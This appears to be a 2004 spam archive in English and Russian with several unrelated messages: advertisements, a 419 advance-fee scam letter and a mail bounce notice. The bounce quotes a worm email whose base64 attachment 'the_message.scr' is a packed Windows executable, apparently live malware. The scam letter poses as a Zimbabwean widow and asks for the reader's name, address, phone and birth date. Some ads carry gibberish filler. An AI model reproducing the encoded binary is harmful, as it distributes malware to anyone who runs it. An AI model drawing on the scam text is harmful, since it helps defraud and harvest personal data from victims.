As you can see, the Thomas Kinkade "Village Christmas" illuminated tree might well be the most original Kinkade collectible yet! Available on a first-come, first-served basis for a limited time only, DON'T WAIT to order yours now!
Go here for more info
SHOP WITH CONFIDENCE!
We offer a 100% money-back guarantee
for 365 days on collectibles, 60 days on jewelry.
Our e-mail recipients get the first chance to see new collectibles. If you would rather unsubscribe from collectiblestoday.com, please Go here.
It's Nice to Share!
Forward this e-mail to a friend so they can enjoy this wonderful collectible too!
Collectibles Today
9307 N Milwaukee Ave
Niles, IL 60714
©2004 Thomas Kinkade, The Thomas Kinkade Company, Morgan Hill, CA
Copyright © 2004 Collectibles Today® All rights reserved.
--------------------------------------------------------------------------------
Our goal is to provide only the best selection of quality 0ffers.
We hope you enjoyed receiving this message.
However, if you'd rather not receive future e-mails from 0ffersMax,
please un-subscribe below or send a postal letter to
301 E, 47th St, New York, NY - 10017
unsubscribe
--------------------------------------------------------------------------------
30.08.2004 в 07:42
A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:
[email protected]
This message has been rejected because it has
a potentially executable attachment "the_message.scr"
This form of attachment has been used by
recent viruses or other malware.
If you meant to send this file then please
package it up as a zip file and resend it.
------ This is a copy of the message, including all the headers. ------
Return-path: <[email protected]>
Received: from [62.118.156.73] (helo=ЕКЕМЮ.org)
by base.infostream.ru with smtp (Exim 4.34)
id 1C1d1D-0007sb-DY
for [email protected]; Mon, 30 Aug 2004 06:39:58 +0300
Date: Mon, 30 Aug 2004 07:39:42 +0300
To: "E" <[email protected]>
From: "" <[email protected]>
Subject: Re: Incoming Message
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--------gbayanzlrgjtqvucrous"
----------gbayanzlrgjtqvucrous
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit
<html><body>
<br>
</body></html>
----------gbayanzlrgjtqvucrous
Content-Type: application/octet-stream; name="the_message.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="the_message.scr"
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
02.09.2004 в 08:04
Glendoven Farms,
Chipinge, Zimbabwe.
Dear Sir,
I am Mrs. Labaram E. Van Glendoven, a widow to late Donald Van
Glendoven,awhite Zimbabwean Farmer and political opposition leader,
before his suden death, the owner of Diary farms limited in Zimbabwe.
He owned three tobacco farms in Chipinge, also a majority owner of
Glendoven. Farm also situated in Chipinge, in Zimbabwe. You can see more
details about my situation and BBC interviews on the websites below:
http://www.1freespace.com/beetee/nov19_2001.html
http://news.bbc.co.uk/1/hi/world/africa/918781.stm
http://news.bbc.co.uk/1/hi/world/africa/715001.stm
http://news.bbc.co.uk/1/hi/world/africa/1063785.stm
http://www.gta.gov.zw/land issues/LAND.htm
I am contacting you as the need to for me to have a foreign partner in
your country has become necessary due to our plans to relocate to that
country so that I can start my life all over again as the present
political instability in Zimbabwe does not encourage financial
investment as the environment is no longer conducive for me and my
three children.Because of the political instabilities and wanton distruction of lives and properties, I was assisted by a good samaritan to safety in Johannesburg,South Africa before we eventually found ourselves in Nigeria.This was reported widely by most international media.
This problem started when the Zimbabwean government under the
leadership of President Robert Mugabe announced a decree on May 31st
2000 to seize more than 849 white and political opposition owned farms.
During these periods, as reported by international media, BBC and the
CNN, more than 6 white farmers were killed including my late husband.
The government did not stop at this, as just recently the government have
asked all white-farmers to give up their farms to black farmers and
politicians who are in alliance with the ruling party or risk going to
prison and possibly killed. So far, more than 1,400 white owned farms
have been invaded and confiscated, as well as claiming the properties
of the farmers.Also,about 133 white farmers were arrested for defying
the orders to leave their farms under the controversial land reform
programme of the government.Having married and lived with my late husband in this country Zimbabwe for more than 32 years, I have no other country to go to. Therefore, I decided to contact you, for your assistance, so that I can divert my interest in Zimbabwe to a more stablecountry as yours. Before my husband suden death,he was able
to planned well ahead of time to secure some of our properties which were meant for a new farm in Bostwana and made a reasonable money deposit to a finance company in Europe.
I will not disclose the name of the finance company and the amount that
was deposited for security reasons. The reason of the deposit was to
purchase new implements for our new farms. However, I will make
everything known to you as soon as I receive a response through my
lawyer who has been authorized to act on my behalf. The finance company is not aware of the actual contents of the consignment except the declared items (gemstones) as reflected in the deposit certificate. Also, I must re-iterate the importance of having a citizen of
your country to front for me, since I intend to invest and settle in
your country. I do not know much about your country‘s land
ownershiplaws,I thought it wise to seek the help of a citizen to act as
proxy for me and my children as their future is right now very bleak. I will upon receiving your consent make all arrangement to move
the funds to you pending my arrival to meet with you in your country.
Further arrangements would be made regarding investment thereafter.
Every modality will be worked out by my lawyer to ensure that the money
is conveniently moved to your region to enable you receive it in person
without any setbacks or inconveniencies. He will arrange a smooth
meeting between you and the finance company for the delivery.
For your assistance to me, you will be entittled to a commission of 30%
ofthe total sum for this purpose. If you are interested and willing to
assist me, you should please forward to my lawyer via his private email
address as stated below:
MR. JOSEPH A. McCATHY.
McCATHY AND COMPANY.
92, VICTORIA STREET, FRN.
E-MAIL:[email protected]
I am waiting urgently for your response, while also requesting that you
treat this matter in strict privacy.
Presently, I am in great danger under security watch and will
appreciateyou correspond with me via my lawyer‘s confidential email
address:[email protected] with the following details:
1. YOUR FULL NAMES AND CONTACT ADDRESS.
2. YOUR TELEPHONE AND FAX NUMBER .
3. YOUR DATE OF BIRTH.
God bless while I wait for your reply.
MRS LABARAM E. GLENDOVEN.
(GLENDOVEN FARMS, CHIPINGE, ZIMBABWE).
02.09.2004 в 08:06
1-й семинар
ПРАКТИКА ОПЕРАЦИЙ С ГОРОДСКИМИ ЗЕМЕЛЬНЫМИ УЧАСТКАМИ
(ОТВОД, ПРЕДОСТАВЛЕНИЕ, ИСПОЛЬЗОВАНИЕ, ПРИВАТИЗАЦИЯ,
АРЕНДА, ПОКУПКА, ПРОДАЖА, СДЕЛКИ И РЕГИСТРАЦИЯ) В 2004г.
16 – 18 сентября 2004г.
В программе семинара:
• нормативно-правовая база по осуществлению операций с земельными участками;
• формирование и межевание земельных участков как объектов недвижимости в городах в т.ч. в составе кондоминиумов;
• приватизация и оформление права собственности на землю (субъекты и объекты собственности) содержание права собственности, виды и формы собственности, способы получения и прекращения права собственности;
• учетная и регистрационная документация, процедура и оформление прав собственности на земельные участки;
• аренда как форма коммерческого использования земли: функции арендной платы, продажа права аренды, в т.ч. по конкурсу;
• операции на рынке земли: отвод, пользование, выкуп, залог, ипотека, продажа, покупка;
• оценка земельных участков для целей приватизации, оценка кадастровая и индустриальная, влияние на нее месторасположения участка и среды месторасположения, геоэкологических условий, наличия застройки, ценовое зонирование, городская земельная рента, специфика оценки не застроенных и застроенных участков;
• практические примеры оценки участков, распространенные ошибки, методы их устранения;
• земельное налогообложение, система расчета и начисления;
• Арбитражно-судебная практика разрешения споров по поводу рыночных сделок с земельно-недвижимыми объекта;
Участники семинара получают: Сертификат Госстроя РФ – 6 929 руб. НДС не обл. и раздаточный материал
2-й семинар
СОВРЕМЕННОЕ ДЕЛОПРОИЗВОДСТВО:
СЕКРЕТАРИАТА, КАНЦЕЛЯРИИ, ОТДЕЛА КАДРОВ, АРХИВА
13 – 15 сентября 2004г.
• делопроизводство в управленческом процессе: информативность и классификация документов;
• требования к оформлению документов: порядок оформления и виды бланков; реквизиты; порядок подписания, согласования и утверждения; анализ характерных ошибок при оформлении документа;
• порядок составления документов: организационные - положения, инструкции, правила, протоколы; распорядительные - приказы, указания, распоряжения; информационно-справочные;
• организация документооборота: типовая инструкция по делопроизводству; порядок индексации и регистрации исходящей, входящей и внутренней корреспонденции, контроль исполнения сроков;
• составление номенклатуры дел: определение сроков хранения, внутренняя опись дел, подготовка к передаче в архив, порядок уничтожения;
• формирование и оформление дел постоянного и долговременного сроков хранения: внутренняя опись, лист-заверитель, обложка дела; подготовка дел к сдаче в архив; порядок уничтожения;
• нормативно-правовая база, регламентирующая работу кадровой службы, государственный контроль;
• документационное закрепление структуры и штата предприятия: штатное расписание;
• внутренние локальные нормативные акты: правила внутреннего трудового распорядка, положение об обработке персональных данных работника, положение о структурных подразделениях, должностныеинструкции работников;
• унифицированные формы первичной учетной документации по учету кадров: оформление приема на работу, перевода, прекращения действия трудового договора, предоставления отпуска, направления в командировку, поощрения; особенности визирования и регистрации приказов по личному составу;
• оформление и ведение личной карточки: запись об общем и непрерывном трудовом стаже;
• ведение трудовой книжки в соответствии с Трудовым кодексом; внесение изменений и исправлений; характерные ошибки, допускаемые при заполнении трудовых книжек;
• формирование личных дел: документы личного дела, составление описи;
• составление и оформление номенклатуры дел для кадровой службы предприятия: сроки хранениядокументов по личному составу, особенности участия кадровой службы в организации и работе экспертнойкомиссии предприятия;
• формирование и оформление дел по личному составу; ответственность за хранение и уничтожение документов; штрафные санкции за гибель документов, незаконное их уничтожение;
• особенности работы с документами, содержащими коммерческую и служебную тайну;
• новое в архивном делопроизводстве: перечень типовых управленческих документов Росархива: новыеформы и документы, приведенные в "Основных правилах работы архивов организаций" в 2002г.;составление и оформление описей дел;
• компьютеризация работы секретариата; канцелярии, ОК, архива, поисковые системы;
Участникам семинара выдается Удостоверение Установленного образца и раздаточный материал.
Стоимость участия в семинаре без стоимости питания:- 6 683 руб. НДС не обл.
Телефоны для заблаговременной регистрации участников: (095) 187_06_43, 152_56_23
Участники семинара должны иметь копию платежного поручения. Им выдается счет-фактура, договор акт о выполненных работах, копия лицензии бронируется гостиница (проживание оплачивается самостоятельно). Регистрация: Москва, ул.Сельскохозяйственная д.17/2, корп. 5, Гостиница «Турист» корпус «Учебно- тренинговой гостиницы», ауд. 209, (м. Ботанический сад)
fmYP
02.09.2004 в 08:22
Юридическая компания "ЮрКонсалт Трейд"
предоставляет следующие виды юридических услуг:
Готовые ООО;
Регистрация ООО, ЗАО, ОАО;
Регистрация ПБОЮЛ;
Регистрация эмиссий акций (ФКЦБ);
Юридические адреса;
Регистрация некоммерческих организаций;
Внесение изменений в учредительные документы;
Консультации по вопросам прав акционеров и участников;
Разработка учредительных документов на заказ;
Проведение общих собраний акционеров или участников;
Корпоративные споры;
Сопровождение крупных сделок и сделок с заинтересованностью.
Ликвидация юридических лиц;
Бухгалтерское сопровождение;
Составление и экспертиза любых видов гражданско-правовых договоров;
Юридическое сопровождение сделок с недвижимостью;
"Сложные" случаи регистрации недвижимости в МКРП.
На комплексный заказ - СКИДКИ!
Контактная информация:
(095) 518~1543, 506~2968, 250~6342
Если вы открыли это письмо, то Вам, наверно нужны юридические услуги. Если Вы открыли это письмо случайно, и Вам не нужны юридические услуги, то срочно удалите его и извините за беспокойство. Отписаться от рассылки можно позвонив по тел. 250 63 42 и сообщив свой e-mail.
лта няыпдоыт еоунеоыош оуролро еишооэохймг рау ткщоолиит абиам
02.09.2004 в 08:25
Если Вы записываете на CD, DVD или видеокассеты презентации, учебные курсы, портфолио, а также юбилеи и другие события - подумайте о том, чтобы красиво оформить их: закажите качественную полиграфию. Благодаря новым цифровым технологиям это можно сделать недорого даже при очень маленьких тиражах.
Телефоны: (095) , 3.6.1-5.7-9.6, 3.6.2-0.2-3.3.
ПОЛИГРАФИЯ ДЛЯ CD
Под стандартный футляр (Jewel Box)
Лицевая обложка 4+0 120х120 мм и оборот 4+0 150х120 мм
50 экз. = 364 руб., 100 экз. = 586 руб., 500 экз. = 2290 руб., 1000 экз = 4413 руб.
Лицевая обложка 4+4 120х120 мм и оборот 4+0 150х120 мм
50 экз. = 666 руб., 100 экз. = 971 руб., 500 экз. = 3260 руб., 1000 экз = 6100 руб.
Лицевая обложка буклет 4 стр. 4+4 240х120 мм и оборот 4+0 150х120 мм
50 экз. = 960 руб., 100 экз. = 1536 руб., 500 экз. = 6080 руб., 1000 экз = 11760 руб.
Лицевая обложка буклет 6 стр. 4+4 360х120 мм и оборот 4+0 150х120 мм
50 экз. = 1112 руб., 100 экз. = 1851 руб., 200 экз = 3370руб., 500 экз. = 7854 руб.
Лицевая обложка брошюра 12 стр. 4+4 120х120 мм и оборот 4+0 150х120 мм
50 экз. = 1757 руб., 100 экз. = 3200 руб., 200 экз. = 5980 руб., 400 экз = 11664 руб.
Под тонкий футляр (Slim Box)
Лицевая обложка 4+0 120х120 мм
50 экз. = 248 руб., 100 экз. = 363 руб., 500 экз. = 1214 руб., 1000 экз = 2276 руб.
Лицевая обложка 4+4 120х120 мм
50 экз. = 418 руб., 100 экз. = 608 руб., 500 экз. = 2047 руб., 1000 экз = 3826 руб.
Лицевая обложка буклет 4 стр. 4+4 240х120 мм
50 экз. = 712 руб., 100 экз. = 1175 руб., 500 экз. = 4866 руб., 1000 экз = 9485 руб.
ПОЛИГРАФИЯ ДЛЯ DVD ИЛИ ВИДЕОКАССЕТ VHS
Обложка вкладыш (274х180 мм) для стандартных пластиковых DVD коробок или вкладыш (260х195 мм) для пластиковых футляров VHS
Обложка 4+0
50 экз. = 460 руб., 100 экз. = 752 руб., 500 экз. = 3280 руб., 1000 экз = 6400 руб.
Обложка 4+4
50 экз. = 773 руб., 100 экз. = 1280руб., 500 экз. = 5600 руб., 1000 экз = 10880 руб.
Буклет для вкладывания внутрь футляра DVD 4 стр. 4+4 (240х180 мм)
50 экз. = 773 руб., 100 экз. = 1280руб., 500 экз. = 5600 руб., 1000 экз = 10880 руб.
Брошюра для вкладывания внутри футляра DVD 8 стр. 120х180 мм 4+4
50 экз. = 1500 руб., 100 экз. = 2806 руб., 200 экз. = 5357 руб., 400 экз = 10586 руб.
Коробка-бандероль для VHS (открытая с 2 сторон) 4+0 105х190 х27 мм
50 экз. = 1072 руб., 100 экз. = 2000 руб., 200 экз. = 3872 руб., 400 экз = 7648 руб.
Цены не включают работу с макетом.
Помимо этого мы печатаем: альбомы, буклеты, брошюры, листовки, наклейки, папки, календари и многое другое.
Телефоны: (095) , 3.6.1-5.7-9.6, 3.6.2-0.2-3.3.
ьеиларт тедалуыын умущлаув таиэсжсн нваиобмйоы
02.09.2004 в 08:26
ОБЯЗАТЕЛЬНЫЙ КУРС ПРОФЕССИОНАЛА ПО КАДРОВОЙ РАБОТЕ
Автор семинара - КОЖЕМЯКИНА ЕЛЕНА АЛЕКСАНДРОВНА, ведущий консультант компании БИЗНЕСЛЭНД, практикующий консультант по трудовому праву крупнейших компаний Москвы и России, руководитель проектов абонементного обслуживания иностранных и российских компаний
Цели:
Представить принципы и правила работы кадровых служб по кадровому делопроизводству с целью создания защищенности компании и работодателя от санкций, налагаемых проверяющими органами
Сократить трудовые и материальные затраты на постановку и ведение кадрового делопроизводства
Придать юридическую силу кадровым документам
Подтвердить и сохранить трудовой стаж сотрудников
Программа:
Постановка системы кадрового делопроизводства с целью оптимизации и сокращения издержек на кадровый документооборот
Рассмотрение правил оформления приказов по личному составу. Придание приказам юридической силы
Принципы работы с трудовыми книжками. Правила внесения записей в трудовую книжку. Правила подсчета трудового стажа. Правила хранения и выдачи трудовых книжек
Особенности оформления документов при увольнении работника по инициативе администрации за прогул, неоднократное неисполнение трудовых обязанностей согласно трудовому договору или правилам внутреннего трудового распорядка без уважительных причин, появление на работе в нетрезвом состоянии
Правила оформления кадровых документов по процедуре сокращения численности или штата работников
Процедура изменения существенных условий трудового договора
Прилагается комплект методических разработок (на электромагнитных и бумажных носителях) с образцами необходимых документов: образцы документов по кадровому делопроизводству в текстовой форме согласно новому ГОСТу 6.30-2003 и унифицированные формы Т1, Т5, Т6, Т8, Т9, Т11 (приказы по приему, переводу, отпуску, увольнению, командированию, премированию), штатное расписание, график отпусков, личные карточки работников формы Т2, уведомление о предстоящем высвобождении работника и изменении существенных условий трудового договора, объяснительные записки, докладные записки, акты. Образцы локальных нормативных актов: типовые правила внутреннего трудового распорядка. Образцы трудовых договоров: срочных, на неопределенный срок. Образец договора возмездного оказания услуг. Новая инструкция по ведению трудовых книжек, введенная в действие 16 апреля 2003 года. Нормативно-методическая база, регламентирующая работу с кадровой документацией
В стоимость семинара входит:
Обед в Ресторане, Две кофе-паузы,
Комплект методических материалов,
Свидетельство установленного образца
Для слушателей из регионов бронируются гостиничные номера.
По вопросам участия обращаться по
телефону: (095) 237-90-17
e-mail: [email protected]
Ближайшие тренинги и семинары:
17 сентября - ПСИХОЛОГИЯ АНТИКРИЗИСНОГО УПРАВЛЕНИЯ КОМПАНИЕЙ
23 сентября - КОНЦЕПЦИЯ ПОЗИЦИОНИРОВАНИЯ - МЕТОДИКА СОЗДАНИЯ КОНКУРЕНТНОГО ПРЕИМУЩЕСТВА
27-28 сентября - СТРАТЕГИЧЕСКОЕ ПЛАНИРОВАНИЕ. БЮДЖЕТИРОВАНИЕ. ПОСТАНОВКА КОНТРОЛЛИНГА НА ПРЕДПРИЯТИИ
28 сентября - РЕФОРМА ВАЛЮТНОГО ЗАКОНОДАТЕЛЬСТВА
28-29 сентября - ОСНОВЫ УПРАВЛЕНИЯ ПРОЕКТАМИ
28-29 сентября - ЭФФЕКТИВНЫЙ ПРОГНОЗ И ОТРАБОТКА АНТИРЕКЛАМЫ
30 сентября - КОРПОРАТИВНЫЙ САЙТ ДЛЯ УСПЕШНОГО БИЗНЕСА - МОЩНЫЙ ИНСТРУМЕНТ ПРОДАЖ
Возможно проведение корпоративного обучения по этим и другим темам
рбсптд дннди гмотдрпто орьт осряидомие моеоьыет йан ирьумотооу
02.09.2004 в 08:29
которая будет проводится в выставочном комплексе
«КРОКУС ЭКСПО» с 07 по 10 сентября 2004 г.
На нашем стенде будет представлен широкий спектр поставляемой нами продукции:
• Подшипники качения и скольжения, системы линейного перемещения, шариковинтовые передачи (ШВП) производства SKF (Швеция), Timken (США), INA, GMN, STAR (Германия), Nadella (Франция);
• Смазки для подшипников и подшипниковых узлов (в т.ч. совместимые с пищевыми продуктами);
• Уплотнения производства CR (Chicago Rawhide) (США);
• Инструмент для монтажа и демонтажа подшипников, индукционные нагреватели;
• Диагностическое оборудование для проведения мониторинга состояния подшипников и машин;
• Приводные ремни любых типов производства Goodyear (США), Optibelt (Германия), Bando (Япония);
• Транспортерные ленты различного исполнения производства Ammeraal (Нидерланды), Esbelt (Испания);
• Втулочно-роликовые цепи производства Arnold and Stolzenberg, Flexon (Германия);
• Модульные пластиковые ленты производства Intralox (Нидерланды);
• Другие комплектующие для ремонта оборудования.
Вы также сможете получить технические консультации по выбору, установке и правильной эксплуатации подшипников и приводных ремней.
